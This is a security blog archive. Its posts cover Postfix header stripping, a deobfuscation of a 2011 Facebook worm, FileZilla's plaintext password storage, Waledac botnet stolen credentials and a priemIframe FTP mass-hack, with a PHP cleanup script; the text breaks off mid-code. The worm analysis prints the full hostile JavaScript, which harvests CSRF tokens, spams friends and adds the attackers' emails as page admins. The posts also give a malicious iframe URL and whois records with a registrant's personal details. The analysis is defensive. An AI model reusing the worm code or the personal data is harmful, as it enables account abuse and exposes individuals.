Archive for the ‘Security’ Category

Hide your source IP with emails relayed by postfix

2013/01/03 1 comment

I hate giving away too much information with the emails I send. If you are using a native e-mail client (e.g. Outlook, Thunderbird, ...) you will most likely relay your email through a mail provider.
E-mail clients are very chatty programs and do not hesitate to give out as much information about the sender as possible. This includes at least:

– Source IP address (the outgoing IP address of your PC)
– Your e-mail client software (Outlook, Exchange Server and so on)
– The version of the software you use

Attackers can use this information to craft targeted attacks against your infrastructure, as your email headers reveal, for example, that you are using an old Outlook version with known vulnerabilities.

To prevent this information disclosure I apply the following header_checks on my Postfix:

/^Received:/    IGNORE
/^User-Agent:/  IGNORE
/^X-Mailer:/    IGNORE
/^X-MimeOLE:/   IGNORE
/^X-MSMail-Priority:/   IGNORE
/^X-Spam-Status:/   IGNORE
/^X-Spam-Level:/    IGNORE
/^X-Sanitizer:/     IGNORE
/^X-Originating-IP:/    IGNORE

Just add these entries to your header_checks file (e.g. /etc/postfix/header_checks) and add

header_checks = regexp:/etc/postfix/header_checks

to your /etc/postfix/main.cf

That's it! Outgoing mails now have all your internal details removed.

Caution!

To prevent your mails from being blocked by the Exchange spam filter, never remove the Message-ID header with rules like the above. Otherwise your e-mails will always land in the Junk-Mail folder!
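As an added example (not part of the original post), here is a small Python simulation of what these IGNORE rules do to a message's header block: it joins folded headers into logical lines the way cleanup(8) does, drops the ones matched by the patterns above and leaves Message-ID untouched. The sample headers, addresses and function names are constructed.

```python
import re

# The IGNORE rules from the header_checks file above. Postfix regexp: tables
# match case-insensitively by default, so re.IGNORECASE mirrors that.
IGNORE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"^Received:", r"^User-Agent:", r"^X-Mailer:", r"^X-MimeOLE:",
    r"^X-MSMail-Priority:", r"^X-Spam-Status:", r"^X-Spam-Level:",
    r"^X-Sanitizer:", r"^X-Originating-IP:",
)]

# Constructed sample header block (RFC 5322 style, with a folded Received
# line); hostnames and addresses are made up.
SAMPLE_HEADERS = """\
Received: from workstation.lan (192.0.2.10) by mail.example.com
\twith ESMTPSA id 4XyZ; Thu, 3 Jan 2013 10:00:00 +0100
From: alice@example.com
To: bob@example.net
Subject: hello
Date: Thu, 3 Jan 2013 10:00:00 +0100
Message-ID: <20130103090000.12345@mail.example.com>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Thunderbird/17.0
X-Mailer: Microsoft Outlook 14.0
X-Originating-IP: [192.0.2.10]
"""


def logical_headers(header_block):
    """Yield one string per logical header. A folded header (continuation
    lines starting with space or tab) stays together with its first line,
    which is how cleanup(8) hands headers to header_checks."""
    current = None
    for line in header_block.splitlines():
        if line[:1] in (" ", "\t") and current is not None:
            current += "\n" + line
        else:
            if current is not None:
                yield current
            current = line
    if current is not None:
        yield current


def apply_ignore_rules(header_block, patterns=IGNORE_PATTERNS):
    """Apply the IGNORE rules; return (kept_headers, dropped_header_names).
    '^' is anchored at the start of the logical header, so a pattern can
    never fire on text inside a continuation line."""
    kept, dropped = [], []
    for header in logical_headers(header_block):
        if any(p.search(header) for p in patterns):
            dropped.append(header.split(":", 1)[0])
        else:
            kept.append(header)
    return kept, dropped


def sanitized_headers(header_block):
    """Return the header block as it would leave the cleanup daemon."""
    kept, _ = apply_ignore_rules(header_block)
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    kept, dropped = apply_ignore_rules(SAMPLE_HEADERS)
    print("dropped:", ", ".join(dropped))
    print(sanitized_headers(SAMPLE_HEADERS))
```

Keep in mind that header_checks in main.cf is applied by cleanup(8) to every message, inbound ones included; Postfix 2.5 and later also offer smtp_header_checks, which only affects mail leaving through the SMTP client.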

profileview.info disassembled – or the anatomy of a Facebook worm

2011/02/22 Leave a comment

Have you received one of those links via Facebook?

Wow! Seems like lots of people stalk me – http://ow.ly/3YDVb
Secret tool shows who stalks your pics – http://tinyurl.com/6gowfed
New FB tool shows who stalks your profile– http://ow.ly/3YDVB
Insane! Awesome tool to see who looks at your pics >> http://goo.gl/lfDvG

Don't click them. I will show you why:

When you access the website, it starts a JavaScript payload encoded shellcode-style, as a list of character codes:

http://pastebin.com/umwmnbaN

It really looks like garbage, so let's decode it:

http://pastebin.com/FmGN13Tm

So let's see what it does (comments are always BELOW the code):

function obscurify(my_content) {
  st = my_content['split'](',');
  d = '';
  for (i = 0; i < st['length']; i++) {
    d += String['fromCharCode'](st[i] - 24);
  };
  eval(d);
};

OK, this is the deobfuscation routine: every comma-separated number minus 24 is a character code, and the rebuilt string goes straight into eval.
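As an added example (my code, not the worm's), here is how an analyst can undo this encoding in Python without ever handing the payload to eval: it peels nested obscurify() layers and pulls the URLs out of the final stage. The sample script and the helper names are constructed.

```python
import re

# Call pattern used by the dropper: obscurify('<n>,<n>,...') where every
# number is a character code shifted up by 24. The regex and helper names
# are mine; only the arithmetic comes from the obscurify() function above.
OBSCURIFY_CALL = re.compile(r"obscurify\(\s*['\"]\s*([\d,\s]+?)\s*['\"]\s*\)")
SHIFT = 24


def encode_layer(script):
    """Produce the encoded form (used here only to build a test sample)."""
    return ",".join(str(ord(ch) + SHIFT) for ch in script)


def decode_layer(blob):
    """Reverse obscurify() without eval: split on ',', subtract 24, chr()."""
    return "".join(chr(int(n) - SHIFT) for n in blob.split(",") if n.strip())


def decode_all(script, max_layers=10):
    """Peel every obscurify('...') layer found in the script until none is
    left; returns the decoded stages, innermost last."""
    stages = []
    current = script
    for _ in range(max_layers):
        m = OBSCURIFY_CALL.search(current)
        if not m:
            break
        current = decode_layer(m.group(1))
        stages.append(current)
    return stages


def extract_urls(script):
    """Pull http(s) URLs out of a decoded stage, for blocklists and reports."""
    return sorted(set(re.findall(r"https?://[^\s'\"<>)]+", script)))


# Constructed sample: a harmless two-stage script, NOT the real payload.
INNER = "var link = 'http://example.invalid/result.php'; alert('hello');"
MIDDLE = "obscurify('" + encode_layer(INNER) + "');"
SAMPLE = "obscurify('" + encode_layer(MIDDLE) + "');"

if __name__ == "__main__":
    for i, stage in enumerate(decode_all(SAMPLE), 1):
        print("stage", i, ":", stage[:60])
    print(extract_urls(decode_all(SAMPLE)[-1]))
```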

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
  iemails = array_emails['split'](',');
  main_emails = [];
  for (i = 0; i < iemails['length']; i++) {
    main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
  };
  with(newx = new XMLHttpRequest) {
    open('POST', '/pages/edit/?id=' + evil_facebook_page + '&sk=admin');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('post_form_id=' + Form_ID + '&fb_dtsg=' + csrf_token + '&fbpage_id=' + evil_facebook_page + '&' + main_emails['join']('&') + '&save=1');
  };
};

Here is the function to invite your friends to the app

function makePost(form_id, message_content, target_friend, unused_var1) {
  formx = form_id['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = form_id['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = form_id['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
  msg = message_content['randomize']() + '\x0A\x0A';
  text_post = '';
  text_actual = '';
  pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + target_friend['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
  update(pxt);
};

This is the mail function for spamming your friends

function update(evil_facebook_app) {
  with(newx = new XMLHttpRequest) {
    open('POST', '/ajax/updatestatus.php?__a=1');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send(evil_facebook_app);
  };
};

This function posts on your wall (setting the status message).

goog1 = 'http://goo.gl/cvY4D';
goog2 = 'http://goo.gl/euvS3';
goog3 = 'http://tiny.cc/v1bwd';
goog4 = 'http://goo.gl/G0yae';
goog5 = 'http://goo.gl/NMclq';
goog6 = 'http://goo.gl/S89Bx';
event_id = '168046893242650';
page_id_x = '195926070436089';
page_id_xx = '136589129739532';
statuses = ['Wow! Seems like lots of people stalk me - ' + goog1, 'New FB tool shows who stalks your profile- ' + goog2, 'Secret tool shows who stalks your pics ' + goog3, 'Insane! Awesome tool to see who looks at your pics >> ' + goog4, 'According to ' + goog5 + ' you\'re my top stalker. Creep.', 'Secret tool shows who stalks your pics - ' + goog6];
subjects = ['Check this out!', 'Hey, whats happening?', 'Hey! This is awesome'];

Here are the links for the spam messages

admin_emails = 'wintersaccohoqr@hotmail.com,adrialovato306@yahoo.com';

These are the accounts of the malware's creators; they receive all your Facebook email addresses, which are sold to spammers...

Array['prototype']['randomize'] = function () {
  return this[Math['floor'](Math['random']() * this['length'])];
};
Object['prototype']['isReady'] = function () {
  if (this['readyState'] == 4 && this['status'] == 200) {
    return true;
  } else {
    return false;
  };
};
String['prototype']['getFriends'] = function () {
  friends2 = this['match'](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)['join'](':')['replace'](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, '')['replace'](/\\\\\\\">/gi, '|')['split'](':')['slice'](1);
  return friends2;
};

Prototype functions

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
  iemails = array_emails['split'](',');
  main_emails = [];
  for (i = 0; i < iemails['length']; i++) {
    main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
  };
  with(newx = new XMLHttpRequest) {
    open('POST', '/pages/edit/?id=' + evil_facebook_page + '&sk=admin');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('post_form_id=' + Form_ID + '&fb_dtsg=' + csrf_token + '&fbpage_id=' + evil_facebook_page + '&' + main_emails['join']('&') + '&save=1');
  };
};

OK, the addAdmin function again; the guys didn't know much about coding.

function loading() {
  var _0x91e5x10 = document['createElement']('div');
  _0x91e5x10['id'] = 'screwyouz';
  _0x91e5x10['setAttribute']('align', 'center');
  _0x91e5x10['style']['margin'] = '0px auto';
  _0x91e5x10['style']['position'] = 'absolute';
  _0x91e5x10['style']['top'] = '10px';
  _0x91e5x10['style']['zindex'] = '100';
  _0x91e5x10['className'] = 'screwyou';
  _0x91e5x10['innerHTML'] = '<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
  document['body']['appendChild'](_0x91e5x10);
};

This is what the coders of the malware think of you: "Screwyou". It shows an animation as if it were scanning your profile. It's just b**s***.

function makePost(form_id, message_content, target_friend, unused_var1) {

<snip>

function update(evil_facebook_app) {

<snip>

Copy & paste can sometimes be a hard job; you lose track of how often you paste something....

if (window['location']['href'] == 'http://www.facebook.com/') {
  formx = (res = document['body']['innerHTML'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
} else {
  with(muhaha = new XMLHttpRequest) {
    open('GET', '/', false);
    send(null);
  };
  formx = (res = muhaha['responseText'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
};

Now they gather a fresh CSRF token from the post form of the Facebook page. This token is supposed to prevent Cross-Site Request Forgery.

alert('Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.');

This shows the message box, as if it would take that long to scan your profile. In reality it is just posting on all of your friends' walls and sending out emails. It also makes you a fan of the malware...

update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
with(newz = new XMLHttpRequest) {
  loading();
  open('POST', '/ajax/pages/fan_status.php?__a=1');
  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  send('fbpage_id=' + page_id_x + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
with(newzz = new XMLHttpRequest) {
  open('POST', '/ajax/pages/fan_status.php?__a=1');
  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  send('fbpage_id=' + page_id_xx + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
void 0;
with(fr = new XMLHttpRequest) {
  open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');
  onreadystatechange = function () {
    if (fr['isReady']()) {
      friends = fr['responseText']['getFriends']();
      idx = [];
      for (i = 0; i < friends['length']; i++) {
        if (!isNaN(friends[i]['split']('|')[0])) {
          idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
        };
      };
      with(invi = new XMLHttpRequest) {
        open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
      };
      cnt_fr = 0;
      tx = setInterval(function () {
        if (cnt_fr == friends['length']) {
          window['location'] = 'http://fbviews.org/result.php';
          clearInterval(tx);
        };
        makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);
        with(xa = new XMLHttpRequest) {
          open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
          onreadystatechange = function () {
            if (xa['isReady']()) {
              compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
              pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
              if (cnt_fr < 15) {
                with(mi = new XMLHttpRequest) {
                  open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
                  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                  send(pxi);
                };
              };
            };
          };
          send(null);
        };
        cnt_fr += 1;
      }, 3000);
    };
  };
  send(null);
};

This is the code doing the dirty work, step by step:

with(fr = new XMLHttpRequest) {
  open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');

It retrieves your complete friends list.

  onreadystatechange = function () {
    if (fr['isReady']()) {
      friends = fr['responseText']['getFriends']();
      idx = [];
      for (i = 0; i < friends['length']; i++) {
        if (!isNaN(friends[i]['split']('|')[0])) {
          idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
        };
      };
      with(invi = new XMLHttpRequest) {
        open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
      };

It sends them an invitation.

      cnt_fr = 0;
      tx = setInterval(function () {
        if (cnt_fr == friends['length']) {
          window['location'] = 'http://fbviews.org/result.php';

This is the page that pretends to calculate who visits whom.

          clearInterval(tx);
        };
        makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);
        with(xa = new XMLHttpRequest) {
          open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
          onreadystatechange = function () {
            if (xa['isReady']()) {
              compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
              pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
              if (cnt_fr < 15) {
                with(mi = new XMLHttpRequest) {
                  open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
                  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                  send(pxi);
                };
              };
            };
          };
          send(null);
        };
        cnt_fr += 1;
      }, 3000);
    };
  };
  send(null);
};
with(ins = new XMLHttpRequest) {
  open('GET', '/insights/?_fb_noscript=1');
  onreadystatechange = function () {
    if (ins['isReady']()) {
      ids = ins['responseText']['match'](/po_\d+">View/gi)['join'](':')['replace'](/(po_|">View)/gi, '')['split'](':');
      cnt_pages = 0;
      tz = setInterval(function () {
        if (cnt_pages == ids['length']) {
          window['location'] = 'http://fbviews.org/result.php';
          clearInterval(tz);
        };
        update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + ids[cnt_pages] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
        addAdmin(ids[cnt_pages], admin_emails, formx, dtx);
        cnt_pages += 1;
      }, 3000);
    };
  };
  send(null);
};

Here it posts the spam to your own pages and calls addAdmin on each of them...

So it's a high price for some unreliable information. You give away all your contact email addresses for free and send spam in your name! This will lower your reputation and fill up your email account with Viagra mails!

Some more information about the domains:

whois fbviews.org

Domain ID:D161495457-LROR
Domain Name:FBVIEWS.ORG
Created On:14-Feb-2011 05:50:54 UTC
Last Updated On:14-Feb-2011 05:58:34 UTC
Expiration Date:14-Feb-2012 05:50:54 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:de089e4b90247f03
Registrant Name:mister  hood
Registrant Street1:14762 Geronomo st
Registrant Street2:
Registrant Street3:
Registrant City:San Diego
Registrant State/Province:CA
Registrant Postal Code:92105
Registrant Country:US
Registrant Phone:+1.6192264473
Registrant Phone Ext.:
Registrant FAX:+1.5555555555
Registrant FAX Ext.:
Registrant Email:eviewoolfolk579@yahoo.com

whois profileview.info

Domain ID:D36383271-LRMS
Domain Name:PROFILEVIEW.INFO
Created On:17-Jan-2011 03:27:44 UTC
Last Updated On:17-Jan-2011 10:37:21 UTC
Expiration Date:17-Jan-2012 03:27:44 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR72743087
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:PROFILEVIEW.INFO@domainsbyproxy.com

Disable FileZilla's save-all-credentials behaviour

2011/02/02 Leave a comment

I have been asked how to get rid of the stored passwords in FileZilla.

First, check out these files:

filezilla.xml, recentservers.xml and sitemanager.xml

On Windows XP

C:\Documents and Settings\<user>\Application Data\FileZilla\

or Vista/Windows 7

C:\Users\<user>\AppData\Roaming\FileZilla\

open them in WordPad, and BAM! ... it's like stealing candy from a baby.

You have to edit C:\Program Files\FileZilla FTP Client\docs\fzdefaults.xml (or the copy under your user profile) and set the kiosk mode!

See the file fzdefaults.xml.example (docs subdirectory). Inside are instructions on how to set FileZilla to not save passwords (kiosk mode 1) or not to save anything at all (kiosk mode 2).

As I'm very disappointed by this feature, I would recommend deleting FileZilla (and manually checking that the files are gone) and using something like WinSCP or Linux.
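As an added example (my code, not from the post or the FileZilla project), a small Python audit that reports which <Server> entries in sitemanager.xml or recentservers.xml still carry a <Pass> element and whether fzdefaults.xml sets a kiosk mode. The XML samples are constructed in the FileZilla3 layout; "Kiosk mode" is the setting name used by fzdefaults.xml.example, everything else (hosts, users, function names) is assumed.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the FileZilla3 layout shared by sitemanager.xml and
# recentservers.xml (<Server> records, optionally nested in <Folder>s).
# Hosts, user names and the password are made up.
SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <User>webmaster</User>
      <Pass>hunter2</Pass>
      <Logontype>1</Logontype>
      <Name>Production site</Name>
    </Server>
    <Folder expanded="1">Clients
      <Server>
        <Host>sftp.customer.invalid</Host>
        <Port>22</Port>
        <User>deploy</User>
        <Logontype>2</Logontype>
        <Name>Customer (asks for the password)</Name>
      </Server>
    </Folder>
  </Servers>
</FileZilla3>
"""

# Constructed fzdefaults.xml fragment. "Kiosk mode" is the setting name used
# in fzdefaults.xml.example; 1 = never save passwords, 2 = save nothing.
SAMPLE_FZDEFAULTS = """<FileZilla3>
  <Settings>
    <Setting name="Kiosk mode">0</Setting>
  </Settings>
</FileZilla3>
"""


def stored_credentials(xml_text):
    """Return (host, user) for every <Server> that still carries a <Pass>
    element. The password value itself is never returned or printed."""
    root = ET.fromstring(xml_text)
    found = []
    for server in root.iter("Server"):
        if server.find("Pass") is not None:
            found.append((server.findtext("Host", ""), server.findtext("User", "")))
    return found


def kiosk_mode(xml_text):
    """Return the configured Kiosk mode, or 0 when the setting is absent."""
    root = ET.fromstring(xml_text)
    for setting in root.iter("Setting"):
        if setting.get("name") == "Kiosk mode":
            return int((setting.text or "0").strip())
    return 0


def audit(sitemanager_xml, fzdefaults_xml):
    """Summarise the findings as human-readable lines."""
    lines = ["stored password for %s@%s" % (user, host)
             for host, user in stored_credentials(sitemanager_xml)]
    if kiosk_mode(fzdefaults_xml) == 0:
        lines.append("Kiosk mode is 0: FileZilla keeps saving passwords")
    return lines


if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_SITEMANAGER, SAMPLE_FZDEFAULTS)))
```

Point the two functions at the real files from the profile paths above to audit your own machine.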

The Last Line Of Defence on Waledac 2.0

2011/02/02 Leave a comment

The Last Line of Defence (TLLOD) wrote on their blog about the reappearing Waledac botnet (a.k.a. SLM / Storm), which started sending out malicious e-cards beginning on New Year's Eve, using stolen credentials.

What seems most striking here are the analogies to the priemIframe attacks.

In particular, we found that the botmasters have a tremendous amount of stolen credentials. More specifically, they have 123,920 login credentials to FTP servers at their disposal. This number is significant, considering the Waledac controllers use an automated program to login to these servers and patch (or upload) specific files to redirect users to sites that serve malware or promote cheap pharmaceuticals.

I think the number of credentials stolen from FileZilla users is much higher; it might be around 1 million or more.

Additionally, stored e-mail credentials were stolen in the Waledac attacks:

We also discovered 489,528 credentials for POP3 email accounts. These credentials are known to be used for “high-quality” spam campaigns. The technique abuses legitimate mail servers by authenticating as the victim through the SMTP-AUTH protocol to send spam messages. This method makes IP-based blacklist filtering considerably more difficult.

Right now, the priemIframe attacks look like a test run of a new botnet. The payload seems to just upload the credentials it finds and exit. It doesn't install itself into the startup directory, so it won't be found by future antivirus clients.

If you had a priemIframe attack on your server, change _ALL_ your passwords!

Let's see what's next.

Update on priemIframe hacks

2011/01/24 3 comments

From all the feedback I receive, it seems the attack is focused on German websites. I drew a flow chart explaining how the circle of death & destruction works:

Roland Bollmann from www.robodurden.com wrote a PHP script to clean up hacked servers. Thanks for the submission:


<?php
// hacked.php version 1.01 2011/01/24
// upload this script somewhere onto your server
// call "find -name php" to get the path to php (like /usr/lib/cgi-bin/php)
// and then call "/usr/lib/cgi-bin/php /home/www/web6/hacked.php path=/"
// to scan and repair the entire server ;-)
//
// www.robodurden.com usage at your own risk :-)
//
// Note: when called over HTTP every option, including 'path' and the
// 'hackmatch' regex, is taken from the query string, so remove the script
// from the webroot again as soon as the cleanup is done.

$hC = array(
    'filereg'   => '/^.+index\.[^.]+$/i',                     // files to inspect
    'hackmatch' => '<iframe.+?priemIframe\.php.+?<\/iframe>', // the injected tag
    'path'      => '.',                                       // where to start
    'test'      => 0                                          // 1 = report only
);

// $_SERVER['PHP_SELF'] is set by the CLI SAPI as well, so check the SAPI name:
// only a genuine command-line run takes its options from $argv.
$sHtml = (PHP_SAPI === 'cli') ? '' : '<br/>';

if ($sHtml)
{
    print "run from http$sHtml\n";
    foreach($hC AS $name => $var)
    {
        if (isset($_GET[$name]))    $hC[$name] = $_GET[$name];
    }
}
else
{
    print "run from console. usage: hacked.php [option1=value1] [option2=value2] ..\n";
    for ($i=1; $i<count($argv); $i++)
    {
        // limit 2: a regex value may itself contain '='
        list($name,$var) = explode('=',$argv[$i],2);
        if (isset($hC[$name]))
        {
            $hC[$name] = $var;
        }
        else    die("unknown command '$name'. possible commands:
'filereg'    = '/^.+index\.[^.]+\$/i'
'hackmatch'    = '<iframe.+?priemIframe\.php.+?<\/iframe>'
'path'        = '.'
'test'        = 0
");
    }
}

foreach($hC AS $name => $var)
{
    if ($sHtml)    print "$name = ".htmlspecialchars($var)."$sHtml\n";
    else    print "$name = $var $sHtml\n";
}

// walk the whole tree below 'path' and keep only the files matching 'filereg'
$Directory = new RecursiveDirectoryIterator($hC['path']);
$Iterator = new RecursiveIteratorIterator($Directory);
$Regex = new RegexIterator($Iterator, $hC['filereg'], RecursiveRegexIterator::GET_MATCH);

$iTotal = 0;
$iTotalHits = 0;
foreach($Regex AS $a)
{
    foreach($a AS $sPath)
    {
        $iTotal++;
        if ($hC['test'])    print "$sPath$sHtml\n";

        if (Load($sPath,$s))
        {
            // cut out every occurrence of the injected iframe, one per loop
            $iHits = 0;
            while(preg_match('/^(.*)'.$hC['hackmatch'].'(.*)$/s',$s,$aM))
            {
                $iHits++;
                $s = $aM[1].$aM[2];
            }
            if ($iHits)
            {
                print "$sPath hits: $iHits$sHtml\n";
                if (!$hC['test'])    Save($sPath,$s);

                $iTotalHits += $iHits;
            }
        }
    }
}

print "total matches: $iTotal$sHtml\ntotal hits: $iTotalHits$sHtml\n";

function Load($sPath,&$sData)
{
    // silence warnings for unreadable files; a failed read returns 0
    error_reporting(E_ERROR | E_PARSE);
    $sData = file_get_contents($sPath);
    error_reporting(E_ERROR | E_WARNING | E_PARSE);

    if ($sData === FALSE)
    {
        return 0;
    }
    return 1;
}

function Save($sPath,$sData)
{
    global $sHtml;    // was undefined inside this function before
    $hfile = fopen($sPath, "w");
    if (!$hfile)
    {
        print("the file $sPath could not be opened for writing :-($sHtml\n");
        return 0;
    }
    fwrite($hfile, $sData);
    fclose($hfile);
    return 1;
}

?>

I just got feedback from the German abuse department of the server provider 1&1: they will check for these links in their access filters. So the world is a little bit safer now. 🙂

Automated attacks since 12/2010 using compromised credentials / chain reaction

2011/01/12 3 comments

Is your browser giving you a content warning while accessing legitimate websites? Do you get a virus warning while reading your favorite online newspaper? Here is why:

In October 2010 a "feature" was disclosed: FileZilla silently stores credentials in an XML document. This had been a 0-day before and has been used since then by malware to collect user credentials. Today there may be a collection of several million compromised records.

Since December 2010, compromised websites have been appearing that are evidence of an automated mass hack. For this hack it doesn't matter which OS, service or application (CMS, Joomla) is installed, as long as the access password wasn't changed. So any content can be changed, even pages thought to be safe, non-active ones like plain HTML.

The attack starts over the protocol the stolen credentials belong to, in this example FTP. The bot retrieves every existing index.* file on the server and inserts a (hidden) iframe:

http://80.91.191.158/stats/priemIframe.php?hashftp=05f5b2944edd017d509cd3b92bfa7f69&hashpage=0d803ee4896cf18a80a781bb7e308ffd

The files are then uploaded again, together with a PHP shell and a blackhat SEO framework.
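As an added example (my code, not the post's and not Roland's hacked.php above), here is a Python scanner for the injection just described that does the same job as hacked.php and additionally extracts the hashftp/hashpage values from every injected iframe for reporting; it writes a .bak copy before cleaning a file. The sample page, the IP and the hash placeholders are constructed, and all function names are mine.

```python
import os
import re
import shutil
import tempfile
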